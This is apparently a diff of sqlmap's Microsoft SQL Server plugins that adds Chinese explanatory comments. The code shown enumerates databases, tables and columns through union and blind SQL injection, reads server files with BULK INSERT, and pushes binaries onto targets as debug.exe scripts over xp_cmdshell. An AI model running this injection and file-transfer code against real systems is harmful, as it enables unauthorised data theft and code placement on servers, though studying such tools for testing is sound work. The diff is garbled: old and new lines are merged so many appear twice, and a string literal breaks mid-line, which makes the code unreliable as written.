# 如果配置中指定了排除的数据库,则跳过
if conf.exclude and re.search(conf.exclude, db, re.I) is not None: if conf.exclude and re.search(conf.exclude, db, re.I) is not None:
infoMsg = "skipping database '%s'" % db infoMsg = "skipping database '%s'" % db
singleTimeLogMessage(infoMsg) singleTimeLogMessage(infoMsg)
continue continue
# 尝试使用不同的查询语句获取表信息
for query in (rootQuery.inband.query, rootQuery.inband.query2, rootQuery.inband.query3): for query in (rootQuery.inband.query, rootQuery.inband.query2, rootQuery.inband.query3):
query = query.replace("%s", db) query = query.replace("%s", db)
value = inject.getValue(query, blind=False, time=False) value = inject.getValue(query, blind=False, time=False) # 执行注入并获取结果
if not isNoneValue(value): if not isNoneValue(value): # 如果结果不为 None则跳出循环
break break
# 如果获取到了表信息,则进行处理
if not isNoneValue(value): if not isNoneValue(value):
value = [_ for _ in arrayizeValue(value) if _] value = [_ for _ in arrayizeValue(value) if _] # 将结果转换为列表
value = [safeSQLIdentificatorNaming(unArrayizeValue(_), True) for _ in value] value = [safeSQLIdentificatorNaming(unArrayizeValue(_), True) for _ in value] # 安全命名表名
kb.data.cachedTables[db] = value kb.data.cachedTables[db] = value # 将表信息缓存到知识库
# 如果没有获取到表信息,并且可以使用推断注入,则使用推断注入获取表信息
if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct: if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct:
# 遍历数据库列表
for db in dbs: for db in dbs:
# 如果配置中排除了系统数据库,则跳过
if conf.excludeSysDbs and db in self.excludeDbsList: if conf.excludeSysDbs and db in self.excludeDbsList:
infoMsg = "skipping system database '%s'" % db infoMsg = "skipping system database '%s'" % db
singleTimeLogMessage(infoMsg) singleTimeLogMessage(infoMsg)
continue continue
# 如果配置中指定了排除的数据库,则跳过
if conf.exclude and re.search(conf.exclude, db, re.I) is not None: if conf.exclude and re.search(conf.exclude, db, re.I) is not None:
infoMsg = "skipping database '%s'" % db infoMsg = "skipping database '%s'" % db
singleTimeLogMessage(infoMsg) singleTimeLogMessage(infoMsg)
continue continue
# 输出获取表数量的提示信息
infoMsg = "fetching number of tables for " infoMsg = "fetching number of tables for "
infoMsg += "database '%s'" % db infoMsg += "database '%s'" % db
logger.info(infoMsg) logger.info(infoMsg)
# 尝试使用不同的查询语句获取表数量
for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3): for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3):
_ = query.replace("%s", db) _ = query.replace("%s", db)
count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 执行推断注入并获取结果
if not isNoneValue(count): if not isNoneValue(count): # 如果结果不为 None则跳出循环
break break
# 如果没有获取到有效的表数量,则跳过
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
if count != 0: if count != 0:
warnMsg = "unable to retrieve the number of " warnMsg = "unable to retrieve the number of "
@ -143,17 +171,18 @@ class Enumeration(GenericEnumeration):
logger.warning(warnMsg) logger.warning(warnMsg)
continue continue
tables = [] tables = [] # 初始化表列表
# 遍历表索引,获取每个表名
for index in xrange(int(count)): for index in xrange(int(count)):
_ = safeStringFormat((rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db), index) _ = safeStringFormat((rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db), index)
table = inject.getValue(_, union=False, error=False) # 执行推断注入并获取结果
table = inject.getValue(_, union=False, error=False) if not isNoneValue(table): # 如果结果不为 None则添加到表列表
if not isNoneValue(table):
kb.hintValue = table kb.hintValue = table
table = safeSQLIdentificatorNaming(table, True) table = safeSQLIdentificatorNaming(table, True) # 安全命名表名
tables.append(table) tables.append(table)
# 如果获取到了表信息,则进行缓存,否则输出警告信息
if tables: if tables:
kb.data.cachedTables[db] = tables kb.data.cachedTables[db] = tables
else: else:
@ -161,25 +190,31 @@ class Enumeration(GenericEnumeration):
warnMsg += "for database '%s'" % db warnMsg += "for database '%s'" % db
logger.warning(warnMsg) logger.warning(warnMsg)
# 如果没有获取到表信息,并且没有指定搜索,则抛出异常
if not kb.data.cachedTables and not conf.search: if not kb.data.cachedTables and not conf.search:
errMsg = "unable to retrieve the tables for any database" errMsg = "unable to retrieve the tables for any database"
raise SqlmapNoneDataException(errMsg) raise SqlmapNoneDataException(errMsg)
else: else:
# 对缓存的表名进行排序
for db, tables in kb.data.cachedTables.items(): for db, tables in kb.data.cachedTables.items():
kb.data.cachedTables[db] = sorted(tables) if tables else tables kb.data.cachedTables[db] = sorted(tables) if tables else tables
# 返回缓存的表信息
return kb.data.cachedTables return kb.data.cachedTables
# 定义 searchTable 方法,用于搜索指定的表
def searchTable(self): def searchTable(self):
foundTbls = {} foundTbls = {} # 初始化找到的表字典
tblList = conf.tbl.split(',') tblList = conf.tbl.split(',') # 获取要搜索的表列表
rootQuery = queries[DBMS.MSSQL].search_table rootQuery = queries[DBMS.MSSQL].search_table # 获取 SQL Server 的表搜索查询语句
tblCond = rootQuery.inband.condition tblCond = rootQuery.inband.condition # 获取表搜索条件
tblConsider, tblCondParam = self.likeOrExact("table") tblConsider, tblCondParam = self.likeOrExact("table") # 获取表搜索的方式 (LIKE 或 EXACT)
# 如果配置中指定了当前数据库,则获取当前数据库
if conf.db == CURRENT_DB: if conf.db == CURRENT_DB:
conf.db = self.getCurrentDb() conf.db = self.getCurrentDb()
# 如果配置中指定了数据库,则分割数据库字符串,否则获取所有数据库
if conf.db: if conf.db:
enumDbs = conf.db.split(',') enumDbs = conf.db.split(',')
elif not len(kb.data.cachedDbs): elif not len(kb.data.cachedDbs):
@ -187,40 +222,48 @@ class Enumeration(GenericEnumeration):
else: else:
enumDbs = kb.data.cachedDbs enumDbs = kb.data.cachedDbs
# 初始化每个数据库的表搜索结果
for db in enumDbs: for db in enumDbs:
db = safeSQLIdentificatorNaming(db) db = safeSQLIdentificatorNaming(db)
foundTbls[db] = [] foundTbls[db] = []
# 遍历要搜索的表列表
for tbl in tblList: for tbl in tblList:
tbl = safeSQLIdentificatorNaming(tbl, True) tbl = safeSQLIdentificatorNaming(tbl, True) # 安全命名表名
# 输出搜索表信息的提示信息
infoMsg = "searching table" infoMsg = "searching table"
if tblConsider == "1": if tblConsider == "1":
infoMsg += "s LIKE" infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
logger.info(infoMsg) logger.info(infoMsg)
# 构建表搜索查询条件
tblQuery = "%s%s" % (tblCond, tblCondParam) tblQuery = "%s%s" % (tblCond, tblCondParam)
tblQuery = tblQuery % unsafeSQLIdentificatorNaming(tbl) tblQuery = tblQuery % unsafeSQLIdentificatorNaming(tbl)
# 遍历数据库列表
for db in foundTbls.keys(): for db in foundTbls.keys():
db = safeSQLIdentificatorNaming(db) db = safeSQLIdentificatorNaming(db) # 安全命名数据库名
# 如果配置中排除了系统数据库,则跳过
if conf.excludeSysDbs and db in self.excludeDbsList: if conf.excludeSysDbs and db in self.excludeDbsList:
infoMsg = "skipping system database '%s'" % db infoMsg = "skipping system database '%s'" % db
singleTimeLogMessage(infoMsg) singleTimeLogMessage(infoMsg)
continue continue
# 如果配置中指定了排除的数据库,则跳过
if conf.exclude and re.search(conf.exclude, db, re.I) is not None: if conf.exclude and re.search(conf.exclude, db, re.I) is not None:
infoMsg = "skipping database '%s'" % db infoMsg = "skipping database '%s'" % db
singleTimeLogMessage(infoMsg) singleTimeLogMessage(infoMsg)
continue continue
# 检查是否可以使用 UNION、ERROR、QUERY 注入技术或直接连接
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
query = rootQuery.inband.query.replace("%s", db) query = rootQuery.inband.query.replace("%s", db)
query += tblQuery query += tblQuery
values = inject.getValue(query, blind=False, time=False) values = inject.getValue(query, blind=False, time=False) # 执行注入并获取结果
# 如果获取到了表信息,则进行处理
if not isNoneValue(values): if not isNoneValue(values):
if isinstance(values, six.string_types): if isinstance(values, six.string_types):
values = [values] values = [values]
@ -230,7 +273,9 @@ class Enumeration(GenericEnumeration):
continue continue
foundTbls[db].append(foundTbl) foundTbls[db].append(foundTbl)
# 如果无法使用上述注入,则使用推断注入搜索表信息
else: else:
# 输出获取表数量的提示信息
infoMsg = "fetching number of table" infoMsg = "fetching number of table"
if tblConsider == "1": if tblConsider == "1":
infoMsg += "s LIKE" infoMsg += "s LIKE"
@ -240,8 +285,8 @@ class Enumeration(GenericEnumeration):
query = rootQuery.blind.count query = rootQuery.blind.count
query = query.replace("%s", db) query = query.replace("%s", db)
query += " AND %s" % tblQuery query += " AND %s" % tblQuery
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 执行推断注入并获取结果
# 如果没有获取到有效的表数量,则跳过
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no table" warnMsg = "no table"
if tblConsider == "1": if tblConsider == "1":
@ -252,50 +297,57 @@ class Enumeration(GenericEnumeration):
continue continue
indexRange = getLimitRange(count) indexRange = getLimitRange(count) # 生成索引范围
# 遍历表索引,获取每个表名
for index in indexRange: for index in indexRange:
query = rootQuery.blind.query query = rootQuery.blind.query
query = query.replace("%s", db) query = query.replace("%s", db)
query += " AND %s" % tblQuery query += " AND %s" % tblQuery
query = agent.limitQuery(index, query, tblCond) query = agent.limitQuery(index, query, tblCond)
tbl = inject.getValue(query, union=False, error=False) tbl = inject.getValue(query, union=False, error=False) # 执行推断注入并获取结果
kb.hintValue = tbl kb.hintValue = tbl
foundTbls[db].append(tbl) foundTbls[db].append(tbl)
# 清理空的数据库表列表
for db, tbls in list(foundTbls.items()): for db, tbls in list(foundTbls.items()):
if len(tbls) == 0: if len(tbls) == 0:
foundTbls.pop(db) foundTbls.pop(db)
# 如果没有找到任何表,则输出警告信息
if not foundTbls: if not foundTbls:
warnMsg = "no databases contain any of the provided tables" warnMsg = "no databases contain any of the provided tables"
logger.warning(warnMsg) logger.warning(warnMsg)
return return
conf.dumper.dbTables(foundTbls) conf.dumper.dbTables(foundTbls) # 将找到的表信息输出到文件
self.dumpFoundTables(foundTbls) self.dumpFoundTables(foundTbls) # 输出找到的表信息
# 定义 searchColumn 方法,用于搜索指定的列
def searchColumn(self): def searchColumn(self):
rootQuery = queries[DBMS.MSSQL].search_column rootQuery = queries[DBMS.MSSQL].search_column # 获取 SQL Server 的列搜索查询语句
foundCols = {} foundCols = {} # 初始化找到的列字典
dbs = {} dbs = {} # 初始化数据库字典
whereTblsQuery = "" whereTblsQuery = "" # 初始化表 WHERE 条件
infoMsgTbl = "" infoMsgTbl = "" # 初始化表信息
infoMsgDb = "" infoMsgDb = "" # 初始化数据库信息
colList = conf.col.split(',') colList = conf.col.split(',') # 获取要搜索的列列表
# 如果配置中指定了排除的列,则跳过
if conf.exclude: if conf.exclude:
colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]
origTbl = conf.tbl origTbl = conf.tbl # 保存原始的表配置
origDb = conf.db origDb = conf.db # 保存原始的数据库配置
colCond = rootQuery.inband.condition colCond = rootQuery.inband.condition # 获取列搜索条件
tblCond = rootQuery.inband.condition2 tblCond = rootQuery.inband.condition2 # 获取表搜索条件
colConsider, colCondParam = self.likeOrExact("column") colConsider, colCondParam = self.likeOrExact("column") # 获取列搜索的方式 (LIKE 或 EXACT)
# 如果配置中指定了当前数据库,则获取当前数据库
if conf.db == CURRENT_DB: if conf.db == CURRENT_DB:
conf.db = self.getCurrentDb() conf.db = self.getCurrentDb()
# 如果配置中指定了数据库,则分割数据库字符串,否则获取所有数据库
if conf.db: if conf.db:
enumDbs = conf.db.split(',') enumDbs = conf.db.split(',')
elif not len(kb.data.cachedDbs): elif not len(kb.data.cachedDbs):
@ -303,30 +355,36 @@ class Enumeration(GenericEnumeration):
else: else:
enumDbs = kb.data.cachedDbs enumDbs = kb.data.cachedDbs
# 初始化每个数据库的列搜索结果
for db in enumDbs: for db in enumDbs:
db = safeSQLIdentificatorNaming(db) db = safeSQLIdentificatorNaming(db)
dbs[db] = {} dbs[db] = {}
# 遍历要搜索的列列表
for column in colList: for column in colList:
column = safeSQLIdentificatorNaming(column) column = safeSQLIdentificatorNaming(column) # 安全命名列名
conf.db = origDb conf.db = origDb # 恢复原始的数据库配置
conf.tbl = origTbl conf.tbl = origTbl # 恢复原始的表配置
# 输出搜索列信息的提示信息
infoMsg = "searching column" infoMsg = "searching column"
if colConsider == "1": if colConsider == "1":
infoMsg += "s LIKE" infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column)
foundCols[column] = {} foundCols[column] = {} # 初始化每个列的搜索结果
# 如果配置中指定了表,则构建表的 WHERE 条件
if conf.tbl: if conf.tbl:
_ = conf.tbl.split(',') _ = conf.tbl.split(',')
whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")" whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")"
infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(tbl for tbl in _)) infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(tbl for tbl in _))
# 如果配置中指定了当前数据库,则获取当前数据库
if conf.db == CURRENT_DB: if conf.db == CURRENT_DB:
conf.db = self.getCurrentDb() conf.db = self.getCurrentDb()
# 如果配置中指定了数据库,则构建数据库信息,否则获取所有数据库
if conf.db: if conf.db:
_ = conf.db.split(',') _ = conf.db.split(',')
infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _))
@ -337,30 +395,35 @@ class Enumeration(GenericEnumeration):
logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb)) logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb))
# 构建列搜索查询条件
colQuery = "%s%s" % (colCond, colCondParam) colQuery = "%s%s" % (colCond, colCondParam)
colQuery = colQuery % unsafeSQLIdentificatorNaming(column) colQuery = colQuery % unsafeSQLIdentificatorNaming(column)
# 遍历数据库列表
for db in (_ for _ in dbs if _): for db in (_ for _ in dbs if _):
db = safeSQLIdentificatorNaming(db) db = safeSQLIdentificatorNaming(db) # 安全命名数据库名
# 如果配置中排除了系统数据库,则跳过
if conf.excludeSysDbs and db in self.excludeDbsList: if conf.excludeSysDbs and db in self.excludeDbsList:
continue continue
# 如果配置中指定了排除的数据库,则跳过
if conf.exclude and re.search(conf.exclude, db, re.I) is not None: if conf.exclude and re.search(conf.exclude, db, re.I) is not None:
continue continue
# 检查是否可以使用 UNION、ERROR、QUERY 注入技术或直接连接
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
query = rootQuery.inband.query % (db, db, db, db, db, db) query = rootQuery.inband.query % (db, db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db) query += " AND %s" % colQuery.replace("[DB]", db)
query += whereTblsQuery.replace("[DB]", db) query += whereTblsQuery.replace("[DB]", db)
values = inject.getValue(query, blind=False, time=False) values = inject.getValue(query, blind=False, time=False) # 执行注入并获取结果
# 如果获取到了列信息,则进行处理
if not isNoneValue(values): if not isNoneValue(values):
if isinstance(values, six.string_types): if isinstance(values, six.string_types):
values = [values] values = [values]
for foundTbl in values: for foundTbl in values:
foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True) foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True) # 安全命名表名
if foundTbl is None: if foundTbl is None:
continue continue
@ -373,7 +436,7 @@ class Enumeration(GenericEnumeration):
conf.tbl = foundTbl conf.tbl = foundTbl
conf.col = column conf.col = column
self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) # 获取列信息
if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db] and not isNoneValue(kb.data.cachedColumns[db][foundTbl]): if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db] and not isNoneValue(kb.data.cachedColumns[db][foundTbl]):
dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl]) dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl])
@ -386,9 +449,11 @@ class Enumeration(GenericEnumeration):
foundCols[column][db].append(foundTbl) foundCols[column][db].append(foundTbl)
else: else:
foundCols[column][db] = [foundTbl] foundCols[column][db] = [foundTbl]
# 如果无法使用上述注入,则使用推断注入搜索列信息
else: else:
foundCols[column][db] = [] foundCols[column][db] = []
# 输出获取包含该列的表数量的提示信息
infoMsg = "fetching number of tables containing column" infoMsg = "fetching number of tables containing column"
if colConsider == "1": if colConsider == "1":
infoMsg += "s LIKE" infoMsg += "s LIKE"
@ -399,8 +464,9 @@ class Enumeration(GenericEnumeration):
query = query % (db, db, db, db, db, db) query = query % (db, db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db) query += " AND %s" % colQuery.replace("[DB]", db)
query += whereTblsQuery.replace("[DB]", db) query += whereTblsQuery.replace("[DB]", db)
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 执行推断注入并获取结果
# 如果没有获取到有效的表数量,则跳过
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no tables contain column" warnMsg = "no tables contain column"
if colConsider == "1": if colConsider == "1":
@ -411,18 +477,19 @@ class Enumeration(GenericEnumeration):
continue continue
indexRange = getLimitRange(count) indexRange = getLimitRange(count) # 生成索引范围
# 遍历表索引,获取每个表名
for index in indexRange: for index in indexRange:
query = rootQuery.blind.query query = rootQuery.blind.query
query = query % (db, db, db, db, db, db) query = query % (db, db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db) query += " AND %s" % colQuery.replace("[DB]", db)
query += whereTblsQuery.replace("[DB]", db) query += whereTblsQuery.replace("[DB]", db)
query = agent.limitQuery(index, query, colCond.replace("[DB]", db)) query = agent.limitQuery(index, query, colCond.replace("[DB]", db))
tbl = inject.getValue(query, union=False, error=False) tbl = inject.getValue(query, union=False, error=False) # 执行推断注入并获取结果
kb.hintValue = tbl kb.hintValue = tbl
tbl = safeSQLIdentificatorNaming(tbl, True) tbl = safeSQLIdentificatorNaming(tbl, True) # 安全命名表名
if tbl not in dbs[db]: if tbl not in dbs[db]:
dbs[db][tbl] = {} dbs[db][tbl] = {}
@ -432,7 +499,7 @@ class Enumeration(GenericEnumeration):
conf.tbl = tbl conf.tbl = tbl
conf.col = column conf.col = column
self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) # 获取列信息
if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]: if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]:
dbs[db][tbl].update(kb.data.cachedColumns[db][tbl]) dbs[db][tbl].update(kb.data.cachedColumns[db][tbl])
@ -440,7 +507,7 @@ class Enumeration(GenericEnumeration):
else: else:
dbs[db][tbl][column] = None dbs[db][tbl][column] = None
foundCols[column][db].append(tbl) foundCols[column][db].append(tbl) # 将找到的表添加到结果中
conf.dumper.dbColumns(foundCols, colConsider, dbs) conf.dumper.dbColumns(foundCols, colConsider, dbs) # 将找到的列信息输出到文件
self.dumpFoundColumn(dbs, foundCols, colConsider) self.dumpFoundColumn(dbs, foundCols, colConsider) # 输出找到的列信息

@ -5,75 +5,81 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import ntpath # 导入必要的模块
import os import ntpath # 导入 ntpath 模块,用于处理 Windows 路径
import os # 导入 os 模块,用于执行操作系统相关操作
from lib.core.common import checkFile
from lib.core.common import getLimitRange from lib.core.common import checkFile # 导入 checkFile 函数,用于检查文件是否存在
from lib.core.common import isNumPosStrValue from lib.core.common import getLimitRange # 导入 getLimitRange 函数,用于生成限制范围
from lib.core.common import isTechniqueAvailable from lib.core.common import isNumPosStrValue # 导入 isNumPosStrValue 函数,用于检查值是否为正数字字符串
from lib.core.common import posixToNtSlashes from lib.core.common import isTechniqueAvailable # 导入 isTechniqueAvailable 函数,用于检查指定的注入技术是否可用
from lib.core.common import randomStr from lib.core.common import posixToNtSlashes # 导入 posixToNtSlashes 函数,用于将 POSIX 路径转换为 NT 路径
from lib.core.common import readInput from lib.core.common import randomStr # 导入 randomStr 函数,用于生成随机字符串
from lib.core.compat import xrange from lib.core.common import readInput # 导入 readInput 函数,用于读取用户输入
from lib.core.convert import encodeBase64 from lib.core.compat import xrange # 导入 xrange 函数,用于兼容 Python 2 和 3 的循环
from lib.core.convert import encodeHex from lib.core.convert import encodeBase64 # 导入 encodeBase64 函数,用于 Base64 编码
from lib.core.convert import rot13 from lib.core.convert import encodeHex # 导入 encodeHex 函数,用于十六进制编码
from lib.core.data import conf from lib.core.convert import rot13 # 导入 rot13 函数,用于 ROT13 编码
from lib.core.data import kb from lib.core.data import conf # 导入 conf 对象,用于访问全局配置信息
from lib.core.data import logger from lib.core.data import kb # 导入 kb 对象,用于访问全局知识库
from lib.core.enums import CHARSET_TYPE from lib.core.data import logger # 导入 logger 对象,用于输出日志
from lib.core.enums import EXPECTED from lib.core.enums import CHARSET_TYPE # 导入 CHARSET_TYPE 枚举,定义字符集类型
from lib.core.enums import PAYLOAD from lib.core.enums import EXPECTED # 导入 EXPECTED 枚举,定义期望的返回值类型
from lib.core.exception import SqlmapNoneDataException from lib.core.enums import PAYLOAD # 导入 PAYLOAD 枚举,定义注入类型
from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.exception import SqlmapNoneDataException # 导入 SqlmapNoneDataException 异常类,用于表示没有数据
from lib.request import inject from lib.core.exception import SqlmapUnsupportedFeatureException # 导入 SqlmapUnsupportedFeatureException 异常类,用于表示不支持的功能
from lib.request import inject # 导入 inject 函数,用于执行 SQL 注入请求
from plugins.generic.filesystem import Filesystem as GenericFilesystem
from plugins.generic.filesystem import Filesystem as GenericFilesystem # 导入 GenericFilesystem 类,作为当前类的父类
# 定义 Filesystem 类,继承自 GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
# 定义 _dataToScr 方法,用于将数据转换为 debug.exe 脚本
def _dataToScr(self, fileContent, chunkName): def _dataToScr(self, fileContent, chunkName):
fileLines = [] fileLines = [] # 初始化文件行列表
fileSize = len(fileContent) fileSize = len(fileContent) # 获取文件大小
lineAddr = 0x100 lineAddr = 0x100 # 设置起始地址
lineLen = 20 lineLen = 20 # 设置每行长度
fileLines.append("n %s" % chunkName) fileLines.append("n %s" % chunkName) # 添加 debug.exe 的 'n' 命令,用于设置文件名
fileLines.append("rcx") fileLines.append("rcx") # 添加 debug.exe 的 'rcx' 命令,用于设置寄存器 cx
fileLines.append("%x" % fileSize) fileLines.append("%x" % fileSize) # 添加文件大小
fileLines.append("f 0100 %x 00" % fileSize) fileLines.append("f 0100 %x 00" % fileSize) # 添加 debug.exe 的 'f' 命令,用于填充内存
# 遍历文件内容,将每一行转换为 debug.exe 的 'e' 命令
for fileLine in xrange(0, len(fileContent), lineLen): for fileLine in xrange(0, len(fileContent), lineLen):
scrString = "" scrString = "" # 初始化每行字符串
for lineChar in fileContent[fileLine:fileLine + lineLen]: for lineChar in fileContent[fileLine:fileLine + lineLen]:
strLineChar = encodeHex(lineChar, binary=False) strLineChar = encodeHex(lineChar, binary=False) # 将字符转换为十六进制字符串
if not scrString: if not scrString:
scrString = "e %x %s" % (lineAddr, strLineChar) scrString = "e %x %s" % (lineAddr, strLineChar) # 如果是第一个字符,则添加 'e' 命令
else: else:
scrString += " %s" % strLineChar scrString += " %s" % strLineChar # 添加字符
lineAddr += len(strLineChar) // 2 lineAddr += len(strLineChar) // 2 # 更新地址
fileLines.append(scrString) fileLines.append(scrString) # 添加到文件行列表
fileLines.append("w") fileLines.append("w") # 添加 debug.exe 的 'w' 命令,用于写入文件
fileLines.append("q") fileLines.append("q") # 添加 debug.exe 的 'q' 命令,用于退出 debug.exe
return fileLines return fileLines # 返回文件行列表
# 定义 _updateDestChunk 方法,用于更新目标文件的 chunk
def _updateDestChunk(self, fileContent, tmpPath): def _updateDestChunk(self, fileContent, tmpPath):
randScr = "tmpf%s.scr" % randomStr(lowercase=True) randScr = "tmpf%s.scr" % randomStr(lowercase=True) # 生成随机的 debug.exe 脚本文件名
chunkName = randomStr(lowercase=True) chunkName = randomStr(lowercase=True) # 生成随机的 chunk 文件名
fileScrLines = self._dataToScr(fileContent, chunkName) fileScrLines = self._dataToScr(fileContent, chunkName) # 将文件内容转换为 debug.exe 脚本
logger.debug("uploading debug script to %s\\%s, please wait.." % (tmpPath, randScr)) logger.debug("uploading debug script to %s\\%s, please wait.." % (tmpPath, randScr))
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr) self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr) # 使用 xp_cmdshell 将 debug.exe 脚本写入到服务器
logger.debug("generating chunk file %s\\%s from debug script %s" % (tmpPath, chunkName, randScr)) logger.debug("generating chunk file %s\\%s from debug script %s" % (tmpPath, chunkName, randScr))
# 执行 debug.exe 脚本,生成 chunk 文件
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
"debug < %s" % randScr, "debug < %s" % randScr,
@ -82,25 +88,26 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
return chunkName return chunkName # 返回 chunk 文件名
# 定义 stackedReadFile 方法,用于读取服务器文件内容,使用堆叠查询
def stackedReadFile(self, remoteFile): def stackedReadFile(self, remoteFile):
if not kb.bruteMode: if not kb.bruteMode:
infoMsg = "fetching file: '%s'" % remoteFile infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
result = [] result = [] # 初始化结果列表
txtTbl = self.fileTblName txtTbl = self.fileTblName # 获取文件表名
hexTbl = "%s%shex" % (self.fileTblName, randomStr()) hexTbl = "%s%shex" % (self.fileTblName, randomStr()) # 生成十六进制表名
self.createSupportTbl(txtTbl, self.tblField, "text") self.createSupportTbl(txtTbl, self.tblField, "text") # 创建支持表,用于存储文件内容
inject.goStacked("DROP TABLE %s" % hexTbl) inject.goStacked("DROP TABLE %s" % hexTbl) # 删除十六进制表
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)")) inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)")) # 创建十六进制表
logger.debug("loading the content of file '%s' into support table" % remoteFile) logger.debug("loading the content of file '%s' into support table" % remoteFile)
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, remoteFile, randomStr(10), randomStr(10)), silent=True) inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, remoteFile, randomStr(10), randomStr(10)), silent=True) # 使用 BULK INSERT 将文件内容读取到支持表
# Reference: https://web.archive.org/web/20120211184457/http://support.microsoft.com/kb/104829 # 将二进制数据转换为十六进制字符串的 SQL 查询
binToHexQuery = """DECLARE @charset VARCHAR(16) binToHexQuery = """DECLARE @charset VARCHAR(16)
DECLARE @counter INT DECLARE @counter INT
DECLARE @hexstr VARCHAR(4096) DECLARE @hexstr VARCHAR(4096)
@ -139,67 +146,76 @@ class Filesystem(GenericFilesystem):
END END
""" % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField) """ % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
binToHexQuery = binToHexQuery.replace(" ", "").replace("\n", " ") binToHexQuery = binToHexQuery.replace(" ", "").replace("\
inject.goStacked(binToHexQuery) ", " ") # 移除多余空格和换行符
inject.goStacked(binToHexQuery) # 执行 SQL 查询,将二进制数据转换为十六进制字符串
# 如果可以使用 UNION 注入,则直接读取十六进制表
